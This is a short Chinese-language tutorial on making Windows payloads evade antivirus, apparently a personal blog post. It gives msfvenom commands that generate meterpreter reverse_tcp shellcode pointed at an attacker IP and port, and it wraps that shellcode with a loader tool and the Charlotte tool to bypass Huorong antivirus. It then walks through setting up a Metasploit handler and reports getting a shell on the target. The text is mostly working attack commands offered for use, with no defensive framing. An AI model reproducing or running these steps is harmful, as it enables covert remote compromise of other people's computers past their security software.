shellcode Loader免杀

测试了一下几款找到的免杀工具

shellcode Loader免杀(windows)

通过shellcode loader来加载bin文件，达到免杀的效果

使用msfvenom生成bin

LHOST和LPORT是攻击机的ip和端口

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.103 LPORT=4444 -f raw > shellcode.bin

目标机

然后就是进入他的安装包里面，将生成bin直接拖入文本框，点击生成

会在桌面生成一个loader.exe点击运行即可

攻击机

msf > use exploit/multi/handler        # 加载模块
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp        # 设置payload
msf exploit(multi/handler) > set LHOST IP    # 设置接收shell的ip
msf exploit(multi/handler) > set LPORT 端口       # 设置生成木马时设置的端口
msf exploit(multi/handler) > run       # 监听

测了一圈，CreateThreadPoolWait　Load　的效果最好

也是火绒免杀

Charlotte(windows免杀)

2021.11.22　火绒免杀

使用步骤

1. git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*
2. cd charlotte
3. msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin
4. python charlotte.py

使用msfvenom生成bin

按照他的用法，装完他的环境之后第一步还是msfvenoms生成一个bin

对于我的攻击机就是msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.100.103 LPORT=4444 -f raw > beacon.bin

打印出来的最后一句就是需要执行的命令

攻击机监听端口

set payload那步需要和之前msfvenom生成的payload一致，不然监听不到

msf > use exploit/multi/handler        # 加载模块
msf exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp        # 设置payload
msf exploit(multi/handler) > set LHOST IP    # 设置接收shell的ip
msf exploit(multi/handler) > set LPORT 端口       # 设置生成木马时设置的端口
msf exploit(multi/handler) > run       # 监听

目标机

目标机运行dll

成功拿到shell

后记

拿到shell之后需要干什么？

https://xz.aliyun.com/t/2536#toc-9